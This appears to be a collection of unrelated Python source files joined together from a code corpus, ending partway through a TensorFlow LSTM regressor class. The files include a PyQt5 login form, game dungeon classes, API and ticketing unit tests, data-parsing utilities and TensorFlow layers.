    'annotations', numeric frame stems) -- confirm against the producer.
    """
    # Keep this script's own source so it can be appended to the log for
    # reproducibility (see the end of this function).
    with open(__file__, 'r') as f:
        _source = f.read()
    # Use first line of file docstring as description if it exists.
    parser = argparse.ArgumentParser(
        description=__doc__.split('\n')[0] if __doc__ else '',
        formatter_class=argparse.ArgumentDefaultsHelpFormatter)
    parser.add_argument('--input-json', required=True)
    parser.add_argument('--output-json', required=True)
    args = parser.parse_args()

    # Log next to the output file (same name, .log suffix).
    logging_path = str(PurePath(args.output_json).with_suffix('.log'))
    setup_logging(logging_path)
    file_logger = logging.getLogger(logging_path)
    logging.info('Source path: %s', Path(__file__).resolve())
    logging.info('Args:\n%s' % vars(args))

    with open(args.input_json, 'r') as f:
        data = json.load(f)

    # Group images by their sequence (parent directory of the file name).
    sequence_images = collections.defaultdict(list)
    for image in data['images']:
        sequence = PurePath(image['file_name']).parent
        sequence_images[sequence].append(image)

    valid_images = []
    valid_image_ids = set()
    removed_images = []
    for sequence in sequence_images:
        # Sort frames numerically by file stem, then drop the final frame.
        sorted_images = sorted(
            sequence_images[sequence],
            key=lambda x: int(PurePath(x['file_name']).stem))
        valid_images.extend(sorted_images[:-1])
        removed_images.append(sorted_images[-1]['file_name'])
    logging.info(
        'Removing %s images: %s' % (len(removed_images), removed_images))

    for image in valid_images:
        valid_image_ids.add(image['id'])
    # Keep only annotations whose image survived the trim.
    annotations = [
        x for x in data['annotations'] if x['image_id'] in valid_image_ids
    ]
    logging.info('Kept %s/%s images, %s/%s annotations' %
                 (len(valid_images), len(data['images']), len(annotations),
                  len(data['annotations'])))
    data['images'] = valid_images
    data['annotations'] = annotations
    with open(args.output_json, 'w') as f:
        json.dump(data, f)

    # Append the captured source of this script to the run log.
    file_logger.info('Source:')
    file_logger.info('=======')
    file_logger.info(_source)
    file_logger.info('=======')
# Script entry point.
if __name__ == "__main__":
    main()
| StarcoderdataPython |
5160040 | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'loginPage.ui'
#
# Created by: PyQt5 UI code generator 5.15.6
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
from quirks.mainApp import _login
import loginUnsuccess,homePage
class Ui_loginPage(object):
    """pyuic5-generated UI for the login window: email/password fields plus
    LOGIN and CANCEL buttons.  Per the file header, manual edits here are
    lost when pyuic5 regenerates the file -- behavior should live elsewhere.
    """
    # The handlers below were generated/stubbed and are currently disabled;
    # they outline the intended login flow (validate, then open the home
    # page or an error dialog).
    # def clickedLogin(self):
    #     email = self.emailEntry.text()
    #     password = self.passwordEntry.text()
    #     userId = _login.login(email,password)
    #     return userId
    #     print(email)
    #     print(password)
    # def openLoginError(self):
    #     self.loginError = QtWidgets.QMainWindow()
    #     self.loginUi = loginUnsuccess.Ui_loginFail()
    #     self.loginUi.setupUi(self.loginError)
    #     self.loginError.show()
    # def openHomePage(self):
    #     self.homePage = QtWidgets.QMainWindow()
    #     self.homeui = homePage.Ui_homePage()
    #     self.homeui.setupUi(self.homePage)
    #     self.homePage.show()
    # def openHome(self):
    #     if self.clickedLogin() == 0:
    #         self.openLoginError()
    #     else:
    #         self.openHomePage()

    def setupUi(self, loginPage):
        # Fixed-size (non-resizable) 503x349 window.
        loginPage.setObjectName("loginPage")
        loginPage.resize(503, 349)
        loginPage.setMinimumSize(QtCore.QSize(503, 349))
        loginPage.setMaximumSize(QtCore.QSize(503, 349))
        self.centralwidget = QtWidgets.QWidget(loginPage)
        self.centralwidget.setObjectName("centralwidget")
        # "EMAIL" label.
        self.emailText = QtWidgets.QLabel(self.centralwidget)
        self.emailText.setGeometry(QtCore.QRect(40, 53, 61, 31))
        font = QtGui.QFont()
        font.setFamily("Bahnschrift SemiBold")
        font.setPointSize(16)
        font.setBold(True)
        font.setWeight(75)
        self.emailText.setFont(font)
        self.emailText.setObjectName("emailText")
        # "PASSWORD" label.
        self.passwordText = QtWidgets.QLabel(self.centralwidget)
        self.passwordText.setGeometry(QtCore.QRect(40, 140, 120, 21))
        font = QtGui.QFont()
        font.setFamily("Bahnschrift SemiBold")
        font.setPointSize(16)
        font.setBold(True)
        font.setWeight(75)
        self.passwordText.setFont(font)
        self.passwordText.setObjectName("passwordText")
        # Email input field.
        self.emailEntry = QtWidgets.QLineEdit(self.centralwidget)
        self.emailEntry.setGeometry(QtCore.QRect(50, 93, 390, 21))
        self.emailEntry.setClearButtonEnabled(True)
        self.emailEntry.setObjectName("emailEntry")
        # Password input field (masked echo mode).
        self.passwordEntry = QtWidgets.QLineEdit(self.centralwidget)
        self.passwordEntry.setEchoMode(QtWidgets.QLineEdit.Password)
        self.passwordEntry.setGeometry(QtCore.QRect(50, 178, 390, 20))
        self.passwordEntry.setClearButtonEnabled(True)
        self.passwordEntry.setObjectName("passwordEntry")
        # LOGIN button (click handler currently disconnected, see above).
        self.loginButton = QtWidgets.QPushButton(self.centralwidget)#, clicked = lambda: self.clickedLogin())
        self.loginButton.setGeometry(QtCore.QRect(260, 242, 91, 31))
        font = QtGui.QFont()
        font.setFamily("Bahnschrift SemiBold")
        font.setPointSize(10)
        font.setBold(True)
        font.setWeight(75)
        self.loginButton.setFont(font)
        self.loginButton.setObjectName("loginButton")
        # CANCEL button.
        self.cancleButton = QtWidgets.QPushButton(self.centralwidget)
        self.cancleButton.setGeometry(QtCore.QRect(370, 242, 91, 31))
        font = QtGui.QFont()
        font.setFamily("Bahnschrift SemiBold")
        font.setPointSize(10)
        font.setBold(True)
        font.setWeight(75)
        self.cancleButton.setFont(font)
        self.cancleButton.setObjectName("cancleButton")
        loginPage.setCentralWidget(self.centralwidget)
        self.retranslateUi(loginPage)
        QtCore.QMetaObject.connectSlotsByName(loginPage)

    def retranslateUi(self, loginPage):
        # Install all user-visible (translatable) strings.
        _translate = QtCore.QCoreApplication.translate
        loginPage.setWindowTitle(_translate("loginPage", "Login"))
        self.emailText.setText(_translate("loginPage", "EMAIL"))
        self.passwordText.setText(_translate("loginPage", "PASSWORD"))
        self.loginButton.setText(_translate("loginPage", "LOGIN"))
        self.cancleButton.setText(_translate("loginPage", "CANCEL"))
# Manual smoke test: launch the login window standalone.
if __name__ == "__main__":
    import sys
    app = QtWidgets.QApplication(sys.argv)
    loginPage = QtWidgets.QMainWindow()
    ui = Ui_loginPage()
    ui.setupUi(loginPage)
    loginPage.show()
    sys.exit(app.exec_())
| StarcoderdataPython |
11208644 | """Merge Stardist Masks."""
| StarcoderdataPython |
6556768 | #!/usr/bin/env python
__author__ = "<NAME>"
__copyright__ = "Copyright 2021, The MUDCake Project"
__credits__ = "<NAME>, <NAME>, <NAME>, <NAME>, <NAME>, <NAME>"
__license__ = """MIT License
Copyright (c) 2021 MUDCake Project
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE."""
__version__ = "1.0.0"
__maintainer__ = "<NAME>"
__email__ = "<EMAIL>"
__status__ = "Development"
from DungeonPackage.Character import Character
from DungeonPackage.Class import Class as Class
from DungeonPackage.DungeonData import DungeonData as DungeonData
from DungeonPackage.Item import Item as Item
from DungeonPackage.Npc import Npc as Npc
from DungeonPackage.Race import Race as Race
from DungeonPackage.Room import Room as Room
from DatabaseHandler.DatabaseHandler import DatabaseHandler
class ActiveDungeon:
    """
    Class for handling an active (running) dungeon session.
    """

    def __init__(self, user_ids: [str] = None, character_ids: [str] = None, rooms: [Room] = None, npcs: [Npc] = None,
                 items: [Item] = None, races: [Race] = None,
                 classes: [Class] = None, dungeon_data: DungeonData = None):
        """
        Constructor for ActiveDungeon.

        Collection parameters default to fresh empty lists so the add_*
        methods below can append without None checks.
        """
        # BUG FIX: collections previously stayed None when omitted (so
        # add_item/add_race/... crashed with AttributeError) and `rooms`
        # was wrapped in an extra list ([rooms] -> [None] by default)
        # instead of being stored as the room list itself.
        self.user_ids = user_ids if user_ids is not None else []
        self.character_ids = character_ids if character_ids is not None else []
        self.rooms = rooms if rooms is not None else []
        self.room_dick_list = []   # raw room dicts assembled from DB rows
        self.rooms_objects = []    # Room objects parsed from DB rows
        self.npcs = npcs if npcs is not None else []
        self.items = items if items is not None else []
        self.races = races if races is not None else []
        self.classes = classes if classes is not None else []
        self.dungeon_data = dungeon_data
        self.db_handler = DatabaseHandler()

    def add_item(self, item: Item):
        """
        Add an item to the active dungeon.

        :param item: item object
        """
        self.items.append(item)

    def add_race(self, race: Race):
        """
        Add a race to the active dungeon.

        :param race: race object
        """
        self.races.append(race)

    def is_dungeon_master_in_game(self) -> bool:
        """
        Check whether the dungeon master is among the users in the game.

        :return: True if the dungeon master's user id is present
        """
        # BUG FIX: Python lists have no .contains() method; use `in`.
        return self.dungeon_data.dungeon_master_id in self.user_ids

    def add_room(self, room: Room):
        """
        Add a room to the active dungeon.

        :param room: room object
        """
        self.rooms.append(room)

    def add_class(self, d_class: Class):
        """
        Add a character class to the active dungeon.

        :param d_class: class object
        """
        self.classes.append(d_class)

    def add_character(self, character: Character):
        """Add a character object to the active dungeon.

        Args:
            character (Character): character to be added to the active dungeon

        Returns: void
        """
        self.character_ids.append(character.character_id)

    def load_data(self):
        raise NotImplementedError

    def change_race_visibility(self):
        raise NotImplementedError

    def change_class_visibility(self):
        raise NotImplementedError

    def move_character(self):
        raise NotImplementedError

    def load_rooms(self, dungeon_id):
        """Load all rooms of a dungeon from the database and parse them."""
        rooms_dict = self.db_handler.get_all_rooms_by_dungeon_id_as_dict(dungeon_id=dungeon_id)
        for room_dict in rooms_dict:
            # Re-shape the flat DB row into a nested room description.
            room = {'roomID': room_dict['roomID'], 'name': room_dict['roomName'],
                    'isStartRoom': bool(room_dict['isStartRoom']),
                    'description': room_dict['roomDescription'], 'x': room_dict['x'], 'y': room_dict['y'],
                    'north': bool(room_dict['north']), 'east': bool(room_dict['east']),
                    'south': bool(room_dict['south']), 'west': bool(room_dict['west']),
                    'npc': {'npcID': room_dict['npcID'], 'name': room_dict['npcName'],
                            'description': room_dict['npcDescription'],
                            'equipment': {'itemID': room_dict['npcItemID'],
                                          'name': room_dict['npcItemName'],
                                          'description': room_dict['npcItemDesc']}},
                    'item': {'itemID': room_dict['roomItemID'], 'name': room_dict['roomItemName'],
                             'description': room_dict['roomItemDescription']}}
            self.room_dick_list.append(room)
        self.__parse_rooms(rooms_dict)

    def __parse_rooms(self, room_dict):
        """Convert the raw DB room rows into Room objects (rooms_objects)."""
        for room in room_dict:
            done_room = Room(room_id=room['roomID'], room_name=room['roomName'], is_start_room=room['isStartRoom'],
                             room_description=room['roomDescription'], coordinate_x=room['x'], coordinate_y=room['y'],
                             north=room['north'], east=room['east'], south=room['south'], west=room['west'])
            self.rooms_objects.append(done_room)
| StarcoderdataPython |
5142843 | import hashlib
import os
try:
    import cart
    from utils import random_id_from_collection
except ImportError:
    # cart is Python-3 only: skip this whole test module on Python 2,
    # re-raise on Python 3 where the dependency is genuinely missing.
    import pytest
    import sys
    if sys.version_info < (3, 0):
        pytestmark = pytest.mark.skip
    else:
        raise
def test_children(datastore, client):
    # A file belonging to a multi-file submission must report children.
    submission_id = random_id_from_collection(datastore, 'submission', q="file_count:[2 TO *]")
    submission_data = datastore.submission.get(submission_id)
    file_id = submission_data.files[0].sha256
    res = client.file.children(file_id)
    assert len(res) >= 1
def test_ascii(datastore, client):
    # ASCII view of an arbitrary file is non-empty.
    file_id = random_id_from_collection(datastore, 'file')
    res = client.file.ascii(file_id)
    assert len(res) >= 1
def test_hex(datastore, client):
    # Hex dump output starts with the conventional zero offset column.
    file_id = random_id_from_collection(datastore, 'file')
    res = client.file.hex(file_id)
    assert res.startswith('00000000:')
def test_strings(datastore, client):
    # Extracted printable strings of an arbitrary file are non-empty.
    file_id = random_id_from_collection(datastore, 'file')
    res = client.file.strings(file_id)
    assert len(res) >= 1
# noinspection PyUnusedLocal
def test_download_to_obj(datastore, client):
    # Default download encoding is CaRT: the payload starts with its magic.
    file_id = random_id_from_collection(datastore, 'file')
    res = client.file.download(file_id)
    assert res[:4] == b"CART"
# noinspection PyUnusedLocal
def test_download_to_obj_raw(datastore, client):
    # Raw encoding returns the original bytes: their sha256 is the file id.
    file_id = random_id_from_collection(datastore, 'file')
    res = client.file.download(file_id, encoding="raw")
    assert hashlib.sha256(res).hexdigest() == file_id
# noinspection PyUnusedLocal
def test_download_to_file(datastore, client):
    # Downloading to a path writes a CaRT container whose embedded metadata
    # carries the original file's sha256.
    file_id = random_id_from_collection(datastore, 'file')
    download_output = "/tmp/download_{}".format(file_id)
    try:
        client.file.download(file_id, output=download_output)
        assert open(download_output, 'rb').read(4) == b"CART"
        metadata = cart.get_metadata_only(download_output)
        assert file_id == metadata['sha256']
    finally:
        os.unlink(download_output)
# noinspection PyUnusedLocal
def test_download_to_file_handle(datastore, client):
    # Downloading into an open file handle also yields a CaRT container.
    file_id = random_id_from_collection(datastore, 'file')
    download_output = "/tmp/download_{}_fobj".format(file_id)
    try:
        client.file.download(file_id, output=open(download_output, "wb"))
        assert open(download_output, 'rb').read(4) == b"CART"
    finally:
        os.unlink(download_output)
# noinspection PyUnusedLocal
def test_info(datastore, client):
    # info() echoes back the requested sha256.
    file_id = random_id_from_collection(datastore, 'file')
    res = client.file.info(file_id)
    assert res['sha256'] == file_id
# noinspection PyUnusedLocal
def test_result(datastore, client):
    # result() reports file_info for the requested sha256.
    file_id = random_id_from_collection(datastore, 'file')
    res = client.file.result(file_id)
    assert res['file_info']['sha256'] == file_id
# noinspection PyUnusedLocal
def test_result_for_service(datastore, client):
    # Service-scoped results are filtered to the service extracted from a
    # result id (format: "<sha256>.<service_name>.<rest>").
    result_id = random_id_from_collection(datastore, 'result')
    file_id, service_name, _ = result_id.split('.', 2)
    res = client.file.result(file_id, service=service_name)
    assert res['file_info']['sha256'] == file_id
    assert res['results'][0]['response']['service_name'] == service_name
# noinspection PyUnusedLocal
def test_score(datastore, client):
    # score() returns the file info plus result keys, all prefixed with the
    # file's sha256.
    file_id = random_id_from_collection(datastore, 'file')
    res = client.file.score(file_id)
    assert res['file_info']['sha256'] == file_id
    for k in res['result_keys']:
        assert k[:64] == file_id
| StarcoderdataPython |
253634 | <filename>class1/p34_GradientTape.py
import tensorflow as tf
# Differentiate y = x^2 at x = 3 using automatic differentiation; the
# Variable is created inside the tape, so it is watched automatically.
with tf.GradientTape() as tape:
    x = tf.Variable(tf.constant(3.0))
    y = tf.pow(x, 2)
grad = tape.gradient(y, x)  # dy/dx = 2x = 6.0
print(grad)
| StarcoderdataPython |
4812779 | <filename>fraud_networks/tests/test_dispersion_trees.py
from fraud_networks import DispersionTree, DispersionEdges
#from utilities.dispersion_trees import DispersionTree, DispersionEdges
from fraud_networks.utilities import test_data
import networkx as nx
def test_DispersionEdges():
    # Building edges from the sample fraud case yields a non-empty dataframe.
    disp_edges = DispersionEdges(test_data.fraud_case01())
    assert not disp_edges.edge_dataframe.empty
def test_DispersionTree():
    # A default DispersionTree has edges and its graph is a valid arborescence.
    disp_tree = DispersionTree()
    assert not disp_tree.edge_dataframe.empty
    assert nx.is_arborescence(disp_tree.graph)
| StarcoderdataPython |
4899545 | """
:Copyright: 2006-2021 <NAME>
:License: Revised BSD (see `LICENSE` file for details)
"""
from unittest.mock import patch
import pytest
from pytest import raises
from byceps.events.ticketing import TicketsSold
from byceps.services.shop.order import action_service, action_registry_service
from byceps.services.shop.order import event_service as order_event_service
from byceps.services.shop.order import service as order_service
from byceps.services.ticketing import ticket_service
from byceps.services.ticketing.ticket_creation_service import (
TicketCreationFailed,
)
from .helpers import get_tickets_for_order, mark_order_as_paid, place_order
@pytest.fixture(scope='module')
def ticket_quantity():
    # Number of tickets each test order contains.
    return 4
@pytest.fixture
def order(article, ticket_quantity, storefront, orderer):
    # Place a single-article order; the yield/teardown pattern deletes the
    # order again after the test.
    articles_with_quantity = [(article, ticket_quantity)]
    order = place_order(storefront.id, orderer, articles_with_quantity)
    yield order
    order_service.delete_order(order.id)
@pytest.fixture
def order_action(article, ticket_category):
    # Register the "create tickets on payment" action for the article and
    # unregister it on teardown.
    action_registry_service.register_tickets_creation(
        article.item_number, ticket_category.id
    )
    yield
    action_service.delete_actions_for_article(article.item_number)
@patch('byceps.signals.ticketing.tickets_sold.send')
def test_create_tickets(
    tickets_sold_signal_send_mock,
    admin_app,
    article,
    ticket_category,
    ticket_quantity,
    admin_user,
    orderer_user,
    orderer,
    order,
    order_action,
):
    # Paying the order must create one ticket per ordered item, owned and
    # used by the orderer, log a ticket-created event per ticket, and emit
    # a single TicketsSold signal.
    tickets_before_paid = get_tickets_for_order(order)
    assert len(tickets_before_paid) == 0

    shop_order_paid_event = mark_order_as_paid(order.id, admin_user.id)

    tickets_after_paid = get_tickets_for_order(order)
    assert len(tickets_after_paid) == ticket_quantity
    for ticket in tickets_after_paid:
        assert ticket.owned_by_id == orderer.user_id
        assert ticket.used_by_id == orderer.user_id

    events = order_event_service.get_events_for_order(order.id)
    ticket_created_events = {
        event for event in events if event.event_type == 'ticket-created'
    }
    assert len(ticket_created_events) == ticket_quantity

    tickets_sold_event = TicketsSold(
        occurred_at=shop_order_paid_event.occurred_at,
        initiator_id=admin_user.id,
        initiator_screen_name=admin_user.screen_name,
        party_id=ticket_category.party_id,
        owner_id=orderer_user.id,
        owner_screen_name=orderer_user.screen_name,
        quantity=ticket_quantity,
    )
    tickets_sold_signal_send_mock.assert_called_once_with(
        None, event=tickets_sold_event
    )

    # Clean up.
    for ticket in tickets_after_paid:
        ticket_service.delete_ticket(ticket.id)
@patch('byceps.services.ticketing.ticket_code_service._generate_ticket_code')
def test_create_tickets_with_same_code_fails(
    generate_ticket_code_mock,
    admin_app,
    article,
    ticket_category,
    ticket_quantity,
    admin_user,
    orderer,
    order,
    order_action,
):
    # If the code generator keeps producing the same (colliding) code,
    # ticket creation must give up and raise.
    generate_ticket_code_mock.side_effect = lambda: 'EQUAL'

    with raises(TicketCreationFailed):
        mark_order_as_paid(order.id, admin_user.id)
@patch('byceps.services.ticketing.ticket_code_service._generate_ticket_code')
def test_create_tickets_with_temporarily_equal_code_and_retry_succeeds(
    generate_ticket_code_mock,
    admin_app,
    article,
    ticket_category,
    ticket_quantity,
    admin_user,
    orderer,
    order,
    order_action,
):
    # Exhaust exactly the maximum number of colliding codes, then supply
    # unique codes: the retry logic should succeed on the final attempt.
    code_generation_retries = 4  # Depends on implemented default value.
    necessary_outer_retries = 5  # Depends on argument to `retry` decorator.
    codes = ['EQUAL'] * code_generation_retries * necessary_outer_retries
    codes += ['TCKT1', 'TCKT2', 'TCKT3', 'TCKT4']
    codes_iter = iter(codes)
    generate_ticket_code_mock.side_effect = lambda: next(codes_iter)

    tickets_before_paid = get_tickets_for_order(order)
    assert len(tickets_before_paid) == 0

    mark_order_as_paid(order.id, admin_user.id)

    tickets_after_paid = get_tickets_for_order(order)
    assert len(tickets_after_paid) == ticket_quantity

    # Clean up.
    for ticket in tickets_after_paid:
        ticket_service.delete_ticket(ticket.id)
| StarcoderdataPython |
1626871 | import csv
import numpy as np
from typing import Dict, List
from PyQt5.QtGui import QImage, QColor
import src.core.config as config
def parse(path: str, num_classes: int) -> Dict[int, List[np.ndarray]]:
    """Parse a label-first CSV into per-class lists of 28x28 images.

    Each CSV row is ``label, pixel_0, ..., pixel_783``; pixels are read as
    float32 and reshaped to (-1, 28) (i.e. 28x28 for 784 pixels).

    :param path: path to the CSV file
    :param num_classes: number of class labels; keys 0..num_classes-1 are
        always present in the result, even when a class has no rows
    :return: dict mapping class label -> list of image arrays
    """
    # Dict comprehension replaces the one-line helper loop; every class key
    # exists up front so rows can be appended without membership checks.
    data_set: Dict[int, List[np.ndarray]] = {label: [] for label in range(num_classes)}
    with open(path, newline='\n') as csv_file:
        data_reader = csv.reader(csv_file, delimiter=',')
        # enumerate replaces the manual `i` counter.
        for i, row in enumerate(data_reader, start=1):
            set_label = int(row[0])
            np_set = np.asarray(row[1:], dtype=np.float32).reshape(-1, 28)
            data_set[set_label].append(np_set)
            if i % 1000 == 0:
                # Progress indicator for large files.
                print('csv string parsed: ', i)
    return data_set
def prepare_data_set_dict(num_classes: int) -> Dict[int, list]:
    """Return a dict mapping each class index 0..num_classes-1 to an empty list."""
    # Dict comprehension replaces the manual init-then-assign loop.
    return {label: [] for label in range(num_classes)}
def dump_image(matrix: np.ndarray, number: int) -> None:
    # Render a 2-D grayscale matrix to dump/img<number>.png, one pixel per cell.
    image = QImage(28, 28, QImage.Format_RGB32)
    for i in range(0, matrix.shape[0]):
        for j in range(0, matrix.shape[1]):
            grayscale = matrix[i][j]
            # NOTE(review): QColor expects integer channel values in 0..255;
            # passing float32 values may raise.  Also setPixelColor takes
            # (x, y), so (i, j) maps row i to column x=i, transposing the
            # image -- confirm whether the transposition is intended.
            image.setPixelColor(i, j, QColor(grayscale, grayscale, grayscale))
    image.save('dump/img' + str(number) + '.png')
| StarcoderdataPython |
1701629 | import unittest
import os
import tempfile
from filecmp import cmp
from subprocess import call
import sys
import py_compile
#python -m unittest tests/test_coverage_filter.py
#python -m unittest tests/test_coverage_filter.py
class CoverageFilterTests(unittest.TestCase):
    """Integration tests for the transcript support level filter CLI tool."""

    @classmethod
    def setUpClass(cls):
        # locate the bin and test_data directories
        cls.python = sys.executable
        cls.base_dir = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
        cls.executable = os.path.join(cls.base_dir, "tools", "pvacseq", "transcript_support_level_filter.py")
        cls.test_data_dir = os.path.join(cls.base_dir, "tests", "test_data", "transcript_support_level_filter")

    def test_module_compiles(self):
        # The tool itself must at least byte-compile.
        self.assertTrue(py_compile.compile(self.executable))

    def test_transcript_support_level_filter_runs_and_produces_expected_output(self):
        # BUG FIX: this method name was defined TWICE in the class, so this
        # default-arguments variant was shadowed and never executed; the
        # second definition is renamed below.
        output_file = tempfile.NamedTemporaryFile()
        self.assertFalse(call([
            self.python,
            self.executable,
            os.path.join(
                self.test_data_dir,
                'Test.all_epitopes.tsv'
            ),
            output_file.name
        ], shell=False))
        self.assertTrue(cmp(
            output_file.name,
            os.path.join(self.test_data_dir, "Test.filtered.default.tsv"),
        ))

    def test_transcript_support_level_filter_runs_with_maximum_transcript_support_level(self):
        # Same run, but with --maximum-transcript-support-level 3.
        output_file = tempfile.NamedTemporaryFile()
        self.assertFalse(call([
            self.python,
            self.executable,
            os.path.join(
                self.test_data_dir,
                'Test.all_epitopes.tsv'
            ),
            output_file.name,
            '--maximum-transcript-support-level', '3'
        ], shell=False))
        self.assertTrue(cmp(
            output_file.name,
            os.path.join(self.test_data_dir, "Test.filtered.max_tsl_3.tsv"),
        ))

    def test_transcript_support_level_filter_exclude_nas(self):
        # Rows with NA support levels are dropped when --exclude-NAs is set.
        output_file = tempfile.NamedTemporaryFile()
        self.assertFalse(call([
            self.python,
            self.executable,
            os.path.join(
                self.test_data_dir,
                'Test.all_epitopes.tsv'
            ),
            output_file.name,
            '--exclude-NAs',
        ], shell=False))
        self.assertTrue(cmp(
            output_file.name,
            os.path.join(self.test_data_dir, "Test.filtered.exclude_nas.tsv"),
        ))
| StarcoderdataPython |
6561340 | # from __future__ import absolute_import, division, print_function, unicode_literals
import tensorflow as tf
from tensorflow import keras
from time import strftime
from corl.model.tf2.common import DelayedCosineDecayRestarts
class GlobalStepMarker(keras.layers.Layer):
    """Pass-through layer that counts how many times it has been called.

    The count lives in a non-trainable ``global_step`` variable that is
    incremented on every forward pass; inputs flow through unchanged.
    """

    def __init__(self, time_step=None, feat_size=None):
        super(GlobalStepMarker, self).__init__()
        self.time_step = time_step
        self.feat_size = feat_size

    def build(self, input_shape):
        super(GlobalStepMarker, self).build(input_shape)
        # Non-trainable counter, bumped once per call().
        self.global_step = tf.Variable(initial_value=0,
                                       trainable=False,
                                       name="global_step")

    def getGlobalStep(self):
        """Return the step-counter variable itself (not its value)."""
        return self.global_step

    def call(self, inputs):
        self.global_step.assign_add(1)
        # Identity on the data path.
        return inputs

    def get_config(self):
        return super().get_config().copy()
class LastRelevant(keras.layers.Layer):
    """Gather, for each sequence in the batch, the RNN output at its last
    valid (unpadded) timestep."""

    def __init__(self):
        super(LastRelevant, self).__init__()

    def call(self, inputs):
        lstm, seqlens = inputs
        batch = tf.shape(lstm)[0]
        # Index pairs (b, seqlen_b - 1) pick the last relevant step per row.
        idx = tf.stack(
            [tf.range(batch), tf.reshape(seqlens, [-1]) - 1], axis=1)
        return tf.gather_nd(lstm, idx)

    def get_config(self):
        return super().get_config().copy()
class Squeeze(keras.layers.Layer):
    """Squeeze all size-1 dimensions and pin the static shape to rank 1."""

    def __init__(self):
        super(Squeeze, self).__init__()

    def call(self, inputs):
        squeezed = tf.squeeze(inputs)
        # Declare a 1-D static shape for downstream layers.
        squeezed.set_shape([None])
        return squeezed

    def get_config(self):
        return super().get_config().copy()
class DropoutRate:
    """Compute a (possibly decayed) dropout *keep* probability.

    Before ``decayed_dropout_start`` global steps the keep probability is
    fixed at ``1 - rate``; afterwards it follows a cosine-decay-with-
    restarts schedule.  A small random jitter is applied on top, capped
    at 1.0.
    """

    def __init__(self, rate, decayed_dropout_start, dropout_decay_steps, seed):
        self._rate = rate
        # BUG FIX: self._kp was read in call() but never defined, raising
        # AttributeError.  It is the baseline keep probability (1 - dropout
        # rate), consistent with the decayed branch which also returns
        # 1 - decayed_rate.
        self._kp = 1.0 - rate
        self._decayed_dropout_start = decayed_dropout_start
        self._dropout_decay_steps = dropout_decay_steps
        self._seed = seed

    def call(self):
        gstep = tf.compat.v1.train.get_or_create_global_step()

        def kp():
            # Baseline keep probability (multiply keeps it a tensor).
            return tf.multiply(self._kp, 1.0)

        def cdr_kp():
            # Keep probability under cosine decay with restarts.
            return 1.0 - tf.compat.v1.train.cosine_decay_restarts(
                learning_rate=self._rate,
                global_step=gstep - self._decayed_dropout_start,
                first_decay_steps=self._dropout_decay_steps,
                t_mul=1.05,
                m_mul=0.98,
                alpha=0.01)

        minv = kp()
        if self._decayed_dropout_start is not None:
            # Switch to the decayed schedule once training passes the start step.
            minv = tf.cond(pred=tf.less(gstep, self._decayed_dropout_start),
                           true_fn=kp,
                           false_fn=cdr_kp)
        rdu = tf.random.uniform([],
                                minval=minv,
                                maxval=1.02,
                                dtype=tf.float32,
                                seed=self._seed)
        # Jittered keep probability, never above 1.0.
        return tf.minimum(1.0, rdu)
class Infer(keras.layers.Layer):
    '''
    Returns positive code, positive corl, negative code, negative corl
    '''
    def __init__(self):
        super(Infer, self).__init__()
    def call(self, inputs):
        # NOTE(review): self.refs is never assigned anywhere in this class;
        # calling this layer raises AttributeError unless a caller injects
        # a `refs` lookup table onto the instance first -- confirm intent.
        pos_idx = tf.argmax(input=inputs)   # index of the highest prediction
        neg_idx = tf.argmin(input=inputs)   # index of the lowest prediction
        posc = tf.gather(self.refs, pos_idx)
        pcorl = tf.gather(inputs, pos_idx)
        negc = tf.gather(self.refs, neg_idx)
        ncorl = tf.gather(inputs, neg_idx)
        return posc, pcorl, negc, ncorl
class Worst(keras.layers.Layer):
    # Report the worst prediction: the largest |prediction - target| plus the
    # offending predicted and actual values.
    def __init__(self):
        super(Worst, self).__init__()
    def call(self, inputs):
        # NOTE(review): self.target is never assigned in this class; calling
        # this layer raises AttributeError unless a caller injects `target`
        # onto the instance first -- confirm intent.
        sqd = tf.math.squared_difference(inputs, self.target)
        bidx = tf.argmax(input=sqd)                          # worst element
        max_diff = tf.sqrt(tf.reduce_max(input_tensor=sqd))  # worst abs error
        predict = tf.gather(inputs, bidx)
        actual = tf.gather(self.target, bidx)
        return max_diff, predict, actual
@tf.function
def getInputs(time_step, feat_size):
    # Build the model's two Keras inputs: a (time_step, feat_size) feature
    # sequence and a per-example sequence length.
    # NOTE(review): wrapping keras.Input construction in @tf.function is
    # unusual -- confirm it behaves as intended outside eager mode.
    feat = keras.Input(
        # A shape tuple (integers), not including the batch size.
        shape=(time_step, feat_size),
        # The name becomes a key in the dict.
        name='features',
        dtype='float32')
    seqlens = keras.Input(
        shape=(),
        # The name becomes a key in the dict.
        name='seqlens',
        dtype='int32')
    return [feat, seqlens]
class LSTMRegressorV1:
    '''
    Stacked-LSTM regressor built with the Keras functional API.

    Consumes a dict of inputs {'features': float32 (batch, time_step,
    feat_size), 'seqlens': int32 (batch, 1)}.  `seqlens` is used by the
    `LastRelevant` layer to pick the output of the last valid timestep of
    each (padded) sequence.  Emits a single linear regression value.
    '''

    def __init__(self,
                 layer_width=200,
                 time_step=30,
                 feat_size=3,
                 dropout_rate=0.5,
                 decayed_dropout_start=None,
                 dropout_decay_steps=None,
                 learning_rate=1e-3,
                 decayed_lr_start=None,
                 lr_decay_steps=None,
                 seed=None):
        """
        :param layer_width: units of the first LSTM layer; halved after each
            LSTM / dense layer down the stack
        :param time_step: number of timesteps per input sequence
        :param feat_size: number of features per timestep
        :param dropout_rate: rate of the AlphaDropout layer in the FCN head
